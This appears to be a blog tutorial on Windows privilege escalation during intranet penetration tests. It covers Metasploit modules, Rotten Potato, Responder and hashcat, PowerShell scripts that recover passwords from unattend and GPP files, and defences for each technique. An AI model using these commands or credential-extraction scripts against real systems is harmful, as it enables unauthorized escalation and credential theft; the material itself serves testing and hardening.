
Intranet penetration Chapter 4

2022-06-10 00:51:00 nigo134

1. Privilege escalation through kernel overflow vulnerabilities

Use Metasploit to find missing patches (for example the post/windows/gather/enum_patches module, which reports hotfixes that are absent from the target).

2. Exploiting Windows misconfigurations: analysis and prevention

Misconfigured system service permissions

Windows system services are loaded when the operating system starts and run their executables in the background. If a low-privileged user has write access to the executable that such a service runs, the user can replace that file with an arbitrary executable, and the replacement runs with the service's privileges the next time the service starts. Because Windows services usually run as System, their folders, files and registry keys are normally protected by strong access controls. Nevertheless, unprotected services still turn up in practice, typically third-party software installed outside Program Files whose installer granted Users or Everyone write access.

A service permission misconfiguration (writable service binary or directory) is exploited in one of two ways:

  • The service is not running: the attacker replaces the service binary with an arbitrary one and then starts the service.
  • The service is running and cannot be stopped by the attacker: this is the common case. The attacker usually resorts to DLL hijacking (dropping a DLL that the service loads from a writable location) and then waits for, or forces, a restart of the service to gain its privileges.

Practical use in Metasploit

The corresponding module is exploit/windows/local/service_permissions. With the AGGRESSIVE option set, the module exploits every vulnerable service it finds on the target; with the option disabled, it stops after the first successful escalation.

Running the "run" command spawns a new meterpreter session with System privileges.

The service_permissions module uses two methods to obtain System privileges. If the meterpreter session already runs with administrator privileges, the module tries to create and start a new service. If the current privileges do not allow creating a service, the module checks which service binaries or folders have weak permissions and hijacks one of them. In both cases it writes an executable with a random file name to a random installation path.

The AlwaysInstallElevated registry key

AlwaysInstallElevated is a policy setting that lets Windows Installer run installation packages with System privileges on behalf of low-privileged users. When it is enabled (the value is 1 under both HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer), a user with any privilege level can install a malicious MSI file as NT AUTHORITY\SYSTEM.

The Metasploit module exploit/windows/local/always_install_elevated performs this attack. Load the module, set the SESSION option and enter "run"; the module returns a meterpreter session with System privileges. It builds an MSI file with a random name, installs it, and deletes every file it deployed once the escalation has succeeded.
Setting AlwaysInstallElevated to 0 (or leaving the policy unconfigured) in both hives prevents attackers from escalating through MSI files. Because the value is normally delivered by Group Policy, the fix belongs in the GPO; a local registry edit is overwritten at the next policy refresh.
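The following PowerShell is an added example, not code from the original page or from Metasploit. It reads both policy locations, reports whether the combination is exploitable (Windows Installer elevates only when both the machine and the user value are 1), and offers a remediation function that writes 0 to both; the function names are this example's own.

```powershell
# Added example: audit and remediate the AlwaysInstallElevated policy.
$installerPolicy = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Test-AlwaysInstallElevated {
    $settings = foreach ($path in $installerPolicy) {
        $value = (Get-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $path; AlwaysInstallElevated = $value }
    }
    # Windows Installer runs a per-user install as SYSTEM only when BOTH the
    # machine policy and the user policy are set to 1.
    $enabled = @($settings | Where-Object { $_.AlwaysInstallElevated -eq 1 }).Count -eq 2
    [pscustomobject]@{ Settings = $settings; Exploitable = $enabled }
}

function Disable-AlwaysInstallElevated {
    # Writing HKLM requires an elevated shell. If the value comes from Group Policy,
    # change the GPO instead (Computer/User Configuration > Administrative Templates >
    # Windows Components > Windows Installer > Always install with elevated
    # privileges); otherwise the next policy refresh re-enables it.
    foreach ($path in $installerPolicy) {
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

$state = Test-AlwaysInstallElevated
$state.Settings | Format-Table -AutoSize
if ($state.Exploitable) { Write-Warning 'Any user can install an MSI as NT AUTHORITY\SYSTEM' }
```

Run Test-AlwaysInstallElevated from an ordinary user session during an assessment; run Disable-AlwaysInstallElevated from an elevated session (or fix the GPO) when remediating.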

Trusted service path (unquoted service path) vulnerability

A trusted service path vulnerability (a service path that contains spaces and is not enclosed in quotes) abuses the way Windows resolves file paths, combined with the file and folder permissions along that path. If the executable a service starts is registered by a full path that is not quoted and contains spaces, Windows may run a different file than the one intended, and an attacker who can write to one of the directories on that path can drop an arbitrary executable there. In other words, a service is vulnerable when the path to its executable is unquoted and contains spaces.

The vulnerability can be used in two ways:

  •     If the hijacked location is loaded as the service itself, the planted file must behave as a service (write one, or compile it from a service template).
  •     If the hijacked location is an executable that the service merely launches, any executable will do.

Cause of trusted service path vulnerabilities

Because Windows services usually run as System, the path resolution that Windows performs when a service path contains spaces also happens with System privileges.
For example, take the path C:\Program Files\Some Folder\Service.exe. For each space in the path, Windows tries to find and execute a program named by the text before that space, going through every possibility in turn until it finds a matching program.
In this case, Windows tries, in order:

    C:\Program.exe
    C:\Program Files\Some.exe
    C:\Program Files\Some Folder\Service.exe

Therefore, if an executable with a "suitable" name (here C:\Program.exe or C:\Program Files\Some.exe) is placed in the affected directory, the program runs with System privileges the next time the service starts (in the majority of cases). On a default installation C:\ and C:\Program Files are writable only by administrators, so the exploitable cases are usually third-party services installed in custom directories with loose permissions.
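The search order above can be reproduced and checked for every service on a host. The PowerShell below is an added example, not code from the original page or from Metasploit: it lists services whose binary path is unquoted and contains spaces, computes the intermediate paths Windows would try before the real binary, and probes each containing directory with a temporary file to learn whether the current user could plant an executable there. Function names such as Get-UnquotedServicePaths are this example's own.

```powershell
# Added example: enumerate unquoted service paths and test whether the current
# user could plant an executable at one of the intermediate paths.
function Get-PathCandidates([string]$exe) {
    # Reproduce the search order for an unquoted path with spaces: each space may
    # end the image name, and ".exe" is appended to a name that has no extension.
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-CanPlantFile([string]$candidate) {
    # A real write probe is more reliable than reading ACLs: it also reflects
    # inherited rights and ownership. The probe file is removed immediately.
    $dir = Split-Path -Parent $candidate
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) { return $false }
    $probe = Join-Path $dir ([guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePaths {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $p = $svc.PathName
        if ([string]::IsNullOrWhiteSpace($p) -or $p.StartsWith('"')) { continue }
        # Strip arguments: keep everything up to the first ".exe".
        $m = [regex]::Match($p, '^(.+?\.exe)', 'IgnoreCase')
        $exe = if ($m.Success) { $m.Groups[1].Value } else { $p }
        if ($exe -notmatch ' ') { continue }
        # Paths under the system root are writable only by administrators; skip them.
        if ($exe -like "$env:SystemRoot\*") { continue }
        $candidates = @(Get-PathCandidates $exe)
        [pscustomobject]@{
            Service    = $svc.Name
            StartAs    = $svc.StartName
            StartMode  = $svc.StartMode
            Path       = $exe
            Candidates = $candidates
            Plantable  = @($candidates | Where-Object { Test-CanPlantFile $_ })
        }
    }
}

# Only services with a non-empty Plantable list are worth reporting.
Get-UnquotedServicePaths | Where-Object { $_.Plantable.Count -gt 0 } |
    Format-List Service, StartAs, StartMode, Path, Plantable
```

A service that is reported here but runs as a low-privileged account, or that cannot be restarted without a reboot, is less useful to an attacker than one running as LocalSystem with Auto start mode, which is why both columns are included.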

Practical use in Metasploit

Use the Windows Unquoted Service Path Privilege Escalation module in msf (exploit/windows/local/unquoted_service_path; older versions of the framework called it trusted_service_path) to test this. The module places an executable in the affected folder and then tries to restart the affected service.

msf6 > use exploit/windows/local/unquoted_service_path
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/unquoted_service_path) > set SESSION 5
SESSION => 5
msf6 exploit(windows/local/unquoted_service_path) > set LHOST 1.1.1.5
LHOST => 1.1.1.5
msf6 exploit(windows/local/unquoted_service_path) > run    # spawns a meterpreter session that is killed shortly afterwards; migrate first

After the command runs, a new meterpreter session is returned automatically. Checking the privileges again shows that the escalation succeeded. Note that the new session dies quickly: when the Service Control Manager starts a service process, that process must report back to the SCM, and if it does not, the SCM assumes the service failed to start and terminates it. During a penetration test, migrate the payload into another process before that happens ("set AutoRunScript migrate -f" makes meterpreter migrate automatically as soon as the session opens).

Unattended installation answer files

When a network administrator has to configure many intranet machines in the same way, they are rarely set up one by one; a scripted batch deployment is used instead. This process relies on installation answer files that hold all of the installation configuration, and some of them also contain the local administrator account and password. The usual locations are listed below (the whole file system can be searched for them; the Metasploit module also looks for Unattend.xml under C:\Windows\Panther).

  • C:\sysprep.inf
  • C:\sysprep\sysprep.xml

Metasploit integrates this check in the post/windows/gather/enum_unattend module.
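The same search can be done by hand. The PowerShell below is an added example, not code from the original page or from Metasploit: it checks the locations listed above plus the Panther and Sysprep directories, reads clear-text AdminPassword entries from sysprep.inf, and decodes the Base64 password values in Unattend-style XML (Windows Setup stores them as Base64 of the UTF-16LE password with the literal string "Password" appended when PlainText is false). The function names are this example's own.

```powershell
# Added example: locate leftover answer files and recover the passwords in them.
function ConvertFrom-UnattendPassword([string]$value, [bool]$plainText) {
    if ($plainText) { return $value }
    # Setup stores Base64(UTF-16LE(password + "Password")) when PlainText is false.
    $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($value))
    if ($decoded.EndsWith('Password')) { $decoded = $decoded.Substring(0, $decoded.Length - 8) }
    return $decoded
}

function Find-UnattendCredentials {
    $candidates = @(
        "$env:SystemDrive\sysprep.inf",
        "$env:SystemDrive\sysprep\sysprep.xml",
        "$env:SystemDrive\unattend.xml",
        "$env:SystemRoot\Panther\Unattend.xml",
        "$env:SystemRoot\Panther\Unattend\Unattend.xml",
        "$env:SystemRoot\System32\Sysprep\Unattend.xml",
        "$env:SystemRoot\System32\Sysprep\sysprep.xml"
    )
    foreach ($file in ($candidates | Where-Object { Test-Path -LiteralPath $_ })) {
        if ($file -like '*.inf') {
            # Legacy sysprep.inf keeps the password in clear text under [GuiUnattended].
            Select-String -LiteralPath $file -Pattern '^\s*AdminPassword\s*=\s*(.+)$' | ForEach-Object {
                [pscustomobject]@{ File = $file; Context = 'GuiUnattended/AdminPassword'; Password = $_.Matches[0].Groups[1].Value.Trim() }
            }
            continue
        }
        [xml]$xml = Get-Content -LiteralPath $file -Raw
        # Password elements are AdministratorPassword (UserAccounts), Password (LocalAccount)
        # and Password (AutoLogon); each wraps a Value child and a PlainText child.
        foreach ($valueNode in $xml.SelectNodes('//*[local-name()="Value"]')) {
            $pwNode = $valueNode.ParentNode
            if ($pwNode.LocalName -notlike '*Password') { continue }
            $plainNode = $pwNode.SelectSingleNode('*[local-name()="PlainText"]')
            $plain = ($null -ne $plainNode -and $plainNode.InnerText -eq 'true')
            [pscustomobject]@{
                File     = $file
                Context  = "$($pwNode.ParentNode.LocalName)/$($pwNode.LocalName)"
                Password = ConvertFrom-UnattendPassword $valueNode.InnerText $plain
            }
        }
    }
}

Find-UnattendCredentials | Format-Table -AutoSize
```

The remediation is the same whatever the tool finds: delete leftover answer files after deployment, or at least strip the password elements from them, and rotate any password that was ever stored this way.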

Scheduled tasks

AccessChk is one of the tools in the Sysinternals suite, written by Mark Russinovich, and is used on Windows for advanced querying, management and troubleshooting of the permissions of system objects and programs (for the download address see link 4-6). Because anti-virus software detects tools written to disk, attackers try to avoid touching the target's disk; AccessChk, however, is an official Microsoft tool that generally does not trigger anti-virus alerts, so attackers often use it.
Run AccessChk against the directory in question to view its permission configuration. If the attacker has write access to the directory that holds the program run by a high-privileged scheduled task, the original program can be overwritten with a malicious one, and the next time the scheduled task fires the malicious program runs with high privileges.
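The writable-binary check applies equally to the service binaries from the first section and to the programs that scheduled tasks run as SYSTEM, so one script can cover both. The PowerShell below is an added example, not code from the original page, from Sysinternals or from Metasploit: it parses each service ImagePath and each scheduled-task action, then reports any file or parent directory on which Everyone, Authenticated Users, Users or INTERACTIVE hold rights sufficient to replace the file. It assumes the ScheduledTasks module (Windows 8 / Server 2012 and later); the function names are this example's own.

```powershell
# Added example: find service binaries and scheduled-task actions that run with
# high privilege but that a low-privileged user is allowed to modify.
$lowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # Authenticated Users
    'S-1-5-32-545',  # BUILTIN\Users
    'S-1-5-4'        # INTERACTIVE
)
# Any one of these rights is enough to replace or tamper with the file.
$dangerousRights = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                         [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                         [System.Security.AccessControl.FileSystemRights]::Delete -bor
                         [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                         [System.Security.AccessControl.FileSystemRights]::TakeOwnership)

function Get-WeakAces([string]$target) {
    # Allow ACEs on a file or directory that grant a low-privileged group a dangerous right.
    $acl = Get-Acl -LiteralPath $target -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($lowPrivSids -contains $sid -and (([int]$ace.FileSystemRights -band $dangerousRights) -ne 0)) {
            [pscustomobject]@{ Target = $target; Grantee = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
        }
    }
}

function Get-ImagePath([string]$commandLine) {
    # Extract the executable from a service ImagePath or task action, which may be
    # quoted, carry arguments, or use %SystemRoot%-style variables.
    if ([string]::IsNullOrWhiteSpace($commandLine)) { return $null }
    $c = [Environment]::ExpandEnvironmentVariables($commandLine.Trim())
    if ($c.StartsWith('\??\')) { $c = $c.Substring(4) }
    if ($c.StartsWith('"')) {
        $end = $c.IndexOf('"', 1)
        return $(if ($end -gt 1) { $c.Substring(1, $end - 1) } else { $null })
    }
    $m = [regex]::Match($c, '^(.+?\.exe)', 'IgnoreCase')
    return $(if ($m.Success) { $m.Groups[1].Value } else { ($c -split '\s+')[0] })
}

function Find-WritableHighPrivilegeBinaries {
    # Services: most run as LocalSystem or a service account.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ImagePath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
        foreach ($t in @($exe, (Split-Path -Parent $exe))) {
            Get-WeakAces $t | Select-Object @{n='Source';e={"service $($svc.Name) ($($svc.StartName))"}}, Target, Grantee, Rights
        }
    }
    # Scheduled tasks that run as SYSTEM or with the highest available token.
    foreach ($task in (Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' })) {
        $p = $task.Principal
        if (-not ($p.UserId -match 'SYSTEM$' -or $p.UserId -eq 'S-1-5-18' -or $p.RunLevel -eq 'Highest')) { continue }
        foreach ($action in $task.Actions) {
            $exe = Get-ImagePath $action.Execute
            if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
            foreach ($t in @($exe, (Split-Path -Parent $exe))) {
                Get-WeakAces $t | Select-Object @{n='Source';e={"task $($task.TaskPath)$($task.TaskName) ($($p.UserId))"}}, Target, Grantee, Rights
            }
        }
    }
}

Find-WritableHighPrivilegeBinaries | Format-Table -AutoSize -Wrap
```

The parent directory is checked as well as the file because Delete on the directory's children, or the ability to rename the file away, is enough to substitute a binary even when the file's own ACL is tight. The fix is to repair the ACL (remove the Users/Everyone write grant) or move the program under Program Files, which inherits administrator-only write access.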

Group Policy Preferences: analysis and prevention

SYSVOL is a shared folder in Active Directory that stores the domain's public files and is replicated between all domain controllers in the domain. It is created automatically when Active Directory is installed and mainly holds logon scripts, Group Policy data and other domain information that the domain controllers need. The SYSVOL share is readable by every authenticated domain user and by users in trusted domains. The entire SYSVOL directory is automatically synchronised and shared across all domain controllers, and all domain policies are stored under C:\Windows\SYSVOL\domain\Policies (reachable over the network as \\<domain>\SYSVOL\<domain>\Policies).

In a typical domain environment, all hosts are deployed in batches by script and the amount of data involved is usually large. To manage every machine conveniently, network administrators use domain policy for unified configuration and management. Most organisations require computers to join the domain and use domain credentials for logon. To protect the local administrator password, administrators in these organisations change it through Group Policy. Even so, a security problem remains: changing the password through Group Policy may make it stronger, but the local administrator password then becomes the same on every machine, so an attacker who obtains the local administrator password of one machine effectively has it for every machine in the domain. Worse, a password set through a Group Policy Preference is stored in the preference XML in SYSVOL as a cpassword attribute, encrypted with an AES key that Microsoft published in the MS-GPPREF specification, so any domain user can read and decrypt it. MS14-025 (KB2962486) removed the ability to set passwords through GPP, but XML files that already contain cpassword values remain in SYSVOL until they are deleted.

Common Group Policy Preferences (GPP) items include:

  •     Drive mappings (Drives.xml)
  •     Local user creation (Groups.xml)
  •     Data sources (DataSources.xml)
  •     Printer configuration (Printers.xml)
  •     Service creation/update (Services.xml)
  •     Scheduled tasks (ScheduledTasks.xml)
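The PowerShell below is an added example, not code from the original page or from any of the published GPP tools. It searches the domain's Policies share for any of the preference files above that carry a cpassword attribute and decrypts each value with the AES-256 key from MS-GPPREF (zero IV, PKCS7 padding, UTF-16LE plaintext; the attribute omits the Base64 padding, which has to be restored). The default search path is built from the USERDNSDOMAIN environment variable, and the function names are this example's own.

```powershell
# Added example: hunt SYSVOL for Group Policy Preference items that carry a
# cpassword and recover the clear-text password.
function ConvertFrom-GppCpassword([string]$cpassword) {
    # AES-256 key published by Microsoft in MS-GPPREF; because it is public, every
    # cpassword is trivially recoverable by anyone who can read SYSVOL.
    $key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    # GPP strips the Base64 '=' padding; restore it before decoding.
    $trimmed = $cpassword.Trim()
    $b64 = $trimmed + ('=' * ((4 - $trimmed.Length % 4) % 4))
    $cipher = [Convert]::FromBase64String($b64)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key     = $key
        $aes.IV      = New-Object byte[] 16          # all-zero IV
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
        return [Text.Encoding]::Unicode.GetString($plain)
    } finally {
        $aes.Dispose()
    }
}

function Find-GppPasswords([string]$PoliciesPath = "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies") {
    # Any preference XML may carry a cpassword: Groups.xml, Services.xml,
    # ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml.
    $files = Get-ChildItem -Path $PoliciesPath -Recurse -Filter *.xml -ErrorAction SilentlyContinue |
             Select-String -Pattern 'cpassword=' -List | Select-Object -ExpandProperty Path
    foreach ($file in $files) {
        [xml]$xml = Get-Content -LiteralPath $file -Raw
        foreach ($node in $xml.SelectNodes('//*[@cpassword]')) {
            if (-not $node.cpassword) { continue }   # empty cpassword means no password was set
            # The account attribute differs per item type: userName (Groups), accountName
            # (ScheduledTasks), runAs (Services); newName covers renamed accounts.
            $account = @($node.userName, $node.accountName, $node.runAs, $node.newName) |
                       Where-Object { $_ } | Select-Object -First 1
            [pscustomobject]@{
                File     = $file
                Item     = $node.ParentNode.LocalName   # User, Service, Task, Drive, ...
                Account  = $account
                Password = ConvertFrom-GppCpassword $node.cpassword
            }
        }
    }
}

Find-GppPasswords | Format-Table -AutoSize
```

Defensively, run the same search on every domain after installing KB2962486, delete or edit the preference items it finds, rotate the passwords they exposed, and manage local administrator passwords with a per-machine solution such as LAPS instead of a shared one.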
     

Bypassing UAC: analysis and prevention

On Windows Vista and later, a process without sufficient privileges must pass UAC (User Account Control) authorisation before it can write to the root of the system drive (for example C:\), the Windows and Program Files directories, or the system registry.

UAC overview

UAC is a technology that Microsoft introduced with Windows Vista to improve system security. Before a user performs an operation that may affect the operation of the computer, or changes settings that affect other users, UAC requires the corresponding privileges or an administrator password. Authenticating the user before the operation starts helps prevent malware and spyware from being installed, or computer settings from being changed, without authorisation. Windows Vista and later implement this with mandatory integrity levels: high, medium and low. High-integrity processes have administrator privileges, medium-integrity processes have ordinary user privileges, and low-integrity processes are further restricted so that the damage from a compromise is kept to a minimum.

Operations that require UAC authorisation include:

  •     Configuring Windows Update.
  •     Adding or removing accounts.
  •     Changing an account's type.
  •     Changing UAC settings.
  •     Installing ActiveX controls.
  •     Installing or uninstalling programs.
  •     Installing device drivers.
  •     Moving or copying files into the Program Files or Windows directories.
  •     Viewing other users' folders.

UAC has four notification levels:

  1.     Always notify: the strictest setting; the local user is prompted whenever a program needs elevated privileges.
  2.     Notify me only when programs try to make changes to my computer: the UAC default. When a built-in Windows program requests elevated privileges the user is not notified, but when a third-party program does so the local user is prompted.
  3.     Notify me only when programs try to make changes to my computer (do not dim my desktop): the same as the previous setting, but the desktop is not dimmed while the prompt is shown.
  4.     Never notify: when the user is an administrator, all programs run with the highest privileges without prompting.

The bypassuac module

Assume that the earlier stages of the test have yielded a meterpreter shell on the target that runs with an unelevated (medium-integrity) token, and the goal is System privileges.
First run the exploit/windows/local/bypassuac module to obtain a new meterpreter shell, as shown in Figure 4-48. Then run the "getsystem" command. Checking the privileges again shows that UAC has been bypassed and System privileges obtained, as shown in Figure 4-49.
To escalate with the bypassuac module, the current user must be a member of the local Administrators group and UAC must be at its default level ("Notify me only when programs try to make changes to my computer").
When the bypassuac module runs it creates several files on the target, which anti-virus software may recognise. The exploit/windows/local/bypassuac_injection module instead runs entirely in memory through reflective DLL injection, so it never touches the target's disk and is less likely to be detected by anti-virus software.
At the time of writing, the Metasploit framework did not provide a UAC bypass module for Windows 8.
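Whether those preconditions hold can be checked from the foothold before spending a module on it. The PowerShell below is an added example, not code from the original page or from Metasploit: it reads the UAC policy values, maps them to the four levels listed above, and compares them with the current user's group membership and elevation state. The function name is this example's own.

```powershell
# Added example: read the effective UAC configuration and check the preconditions
# that the stock bypassuac technique relies on for the current user.
function Get-UacState {
    $policy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    # The slider is stored as two values, ConsentPromptBehaviorAdmin / PromptOnSecureDesktop:
    #   2/1 Always notify   5/1 default   5/0 default without dimming   0/0 Never notify
    $level = switch ("$($policy.ConsentPromptBehaviorAdmin)/$($policy.PromptOnSecureDesktop)") {
        '2/1'   { 'Always notify' }
        '5/1'   { 'Notify only when programs try to make changes (default)' }
        '5/0'   { 'Notify only when programs try to make changes, no dimming' }
        '0/0'   { 'Never notify' }
        default { "custom ($_)" }
    }
    if ($policy.EnableLUA -ne 1) { $level = 'UAC disabled (EnableLUA = 0)' }

    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    # Administrators membership survives in the filtered token (as deny-only), so the
    # group list shows whether the user *could* elevate; IsInRole is true only when
    # the process already runs elevated.
    $inAdmins = @($identity.Groups | ForEach-Object { $_.Value }) -contains 'S-1-5-32-544'
    $elevated = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    [pscustomobject]@{
        EnableLUA        = $policy.EnableLUA
        Level            = $level
        User             = $identity.Name
        InAdministrators = $inAdmins
        Elevated         = $elevated
        # bypassuac-style tricks need an Administrators member running unelevated with
        # UAC on and below "Always notify", where signed Windows binaries auto-elevate.
        BypassFeasible   = ($inAdmins -and -not $elevated -and $policy.EnableLUA -eq 1 -and $policy.ConsentPromptBehaviorAdmin -ne 2)
    }
}

Get-UacState | Format-List
```

For defenders the same script is a compliance check: ConsentPromptBehaviorAdmin set to 2 (Always notify) on administrator workstations, and no Administrators membership at all for ordinary users, are the two settings that remove the conditions the module depends on.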

  Defence

  1. In an enterprise network, the best way to prevent UAC bypasses is not to give users of intranet machines local administrator rights, which reduces the chance of the system being attacked.
  2. On a home network, use a non-administrator account for daily work and entertainment. Users who log in with local administrator rights should set UAC to "Always notify" or remove their local administrator rights (after this change Windows prompts for every elevation, as Windows Vista did).
  3. In addition, Microsoft's EMET or Malwarebytes can help protect against 0-day exploits. (EMET was retired in 2018; its mitigations are now part of Exploit Protection in Windows Defender Exploit Guard.)
     

Token stealing: analysis and prevention

Impersonating a user token

Suppose a meterpreter shell on the target has been obtained. First enter the "use incognito" command, then "list_tokens -u" to list the available tokens, as shown in Figure 4-60.

Next, call impersonate_token in incognito to impersonate the Administrator user. Run the "shell" command in the meterpreter session and then type "whoami": the impersonated token WIN-57TJ4B561MT\Administrator shows that system administrator privileges have been obtained, as shown in Figure 4-61.

Rotten Potato local privilege escalation

The key to escalating with Rotten Potato is token impersonation. Ideally the account already in hand holds SeImpersonatePrivilege (or an equivalent privilege); many Windows service accounts have it (IIS application pools and SQL Server, for example).

If a valid token exists on the target, Rotten Potato can quickly impersonate it to escalate. As before, enter "use incognito" and then "list_tokens -u" to list the available tokens.

Once downloaded, the RottenPotato project provides an executable named rottenpotato.exe. Run the following commands to upload rottenpotato.exe to the target machine and use it:

meterpreter > upload /home/kali/Downloads/rottenpotato.exe
meterpreter > use incognito
meterpreter > list_tokens -u                                # list the tokens available before the attack
meterpreter > execute -Hc -f rottenpotato.exe               # run hidden (-H) and channelized (-c)
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"      # incognito requires the backslash to be doubled

  Defensive measures against token theft and escalation are as follows:

  • Install the patches Microsoft pushes promptly.
  • Do not run unknown or dangerous software on the system, nor in a virtual machine on it.
  • Limit the lifetime of tokens so that a cracked hash does not reveal a still-valid token; the more sensitive the data, the shorter the token lifetime should be. If each operation uses a separate token, a leaked token can be traced to the operation or link that leaked it.
  • Store tokens encrypted and protect them with multi-factor authentication.
  • Transmit tokens only over encrypted SSL/TLS links to prevent man-in-the-middle eavesdropping.
     

Access without credentials: analysis and prevention

LLMNR and NetBIOS spoofing attacks

When a name cannot be resolved through DNS in the target network (for example because the DNS server is down), Windows falls back to LLMNR and NBT-NS for computer name resolution. The Responder tool is used for this test.
Responder listens for LLMNR and NBT-NS traffic, captures every LLMNR and NBT-NS request on the network, answers it, and thereby obtains initial account credentials.
Responder can collect credentials from computers in the target network with its built-in SMB, MSSQL, HTTP, HTTPS, LDAP, DNS and WPAD proxy servers as well as FTP, POP3, IMAP and SMTP servers, and its MultiRelay function can be used to execute commands on target systems.
Download and run
Responder is written in Python.

git clone https://github.com/SpiderLabs/Responder.git   # archived; the maintained fork is https://github.com/lgandx/Responder
# on Kali the tool is also packaged; run it as root on the interface facing the target LAN
responder -I eth0

  Penetration test

After analysing the network with Responder, the Net-NTLM hashes of computers in the target network can be obtained over the SMB protocol. When a user enters a wrong computer name, the DNS query fails and the name resolution request falls back to NBT-NS and LLMNR.

With Responder's response function enabled during the test, Responder answers the client's request and claims to be the machine with the mistyped name; the client then tries to establish an SMB connection. The client sends its Net-NTLM hash for authentication, and at that point the target machine's Net-NTLMv2 hash is captured.

 

  Cracking with hashcat (-m 5600 is the NetNTLMv2 mode; p.txt is the word list)

hashcat -m 5600 q::WIN7:524fa9048b91226c... p.txt    (the captured hash string is truncated here)
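Cracking is only possible because clients volunteered the hash to a fallback protocol, so the durable fix is to turn those protocols off. The PowerShell below is an added example, not code from the original page or from Responder: it reports the current LLMNR and NBT-NS state on a Windows host and disables both (the LLMNR value is the one the "Turn off multicast name resolution" policy writes; NBT-NS is disabled per adapter through WMI). It must run in an elevated shell, and the function names are this example's own.

```powershell
# Added example: report and disable the fallback name-resolution protocols that
# Responder abuses. Run elevated; the NBT-NS change is applied per adapter.
function Get-NameResolutionFallbackState {
    $policy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' -ErrorAction SilentlyContinue
    if ($null -eq $policy -or $null -eq $policy.EnableMulticast) { $llmnr = 'not configured (LLMNR on)' }
    elseif ($policy.EnableMulticast -eq 0) { $llmnr = 'disabled' } else { $llmnr = 'enabled' }
    [pscustomobject]@{ Scope = 'LLMNR (EnableMulticast)'; Setting = $llmnr }

    # TcpipNetbiosOptions: 0 = from DHCP (usually on), 1 = enabled, 2 = disabled
    $nbtLabels = @{ 0 = 'from DHCP (usually on)'; 1 = 'enabled'; 2 = 'disabled' }
    foreach ($nic in Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE') {
        [pscustomobject]@{ Scope = "NBT-NS on $($nic.Description)"; Setting = $nbtLabels[[int]$nic.TcpipNetbiosOptions] }
    }
}

function Disable-NameResolutionFallback {
    # Same value the GPO "Computer Configuration > Administrative Templates > Network >
    # DNS Client > Turn off multicast name resolution" sets.
    $dnsPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    if (-not (Test-Path $dnsPolicy)) { New-Item -Path $dnsPolicy -Force | Out-Null }
    Set-ItemProperty -Path $dnsPolicy -Name EnableMulticast -Value 0 -Type DWord

    foreach ($nic in Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE') {
        $result = Invoke-CimMethod -InputObject $nic -MethodName SetTcpipNetbios -Arguments @{ TcpipNetbiosOptions = [uint32]2 }
        # ReturnValue 0 = applied, 1 = applied but a reboot is required
        [pscustomobject]@{ Adapter = $nic.Description; ReturnValue = $result.ReturnValue }
    }
}

Get-NameResolutionFallbackState | Format-Table -AutoSize
```

In a domain the LLMNR part belongs in a GPO and the NBT-NS part in the DHCP scope options (or a startup script), so that new machines do not reintroduce the fallback; WPAD should be disabled in the same change, since Responder's WPAD server captures credentials by the same mechanism.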

 

 


Copyright notice
This article was written by nigo134; please include a link to the original when reposting.
https://yzsam.com/2022/161/202206100023570322.html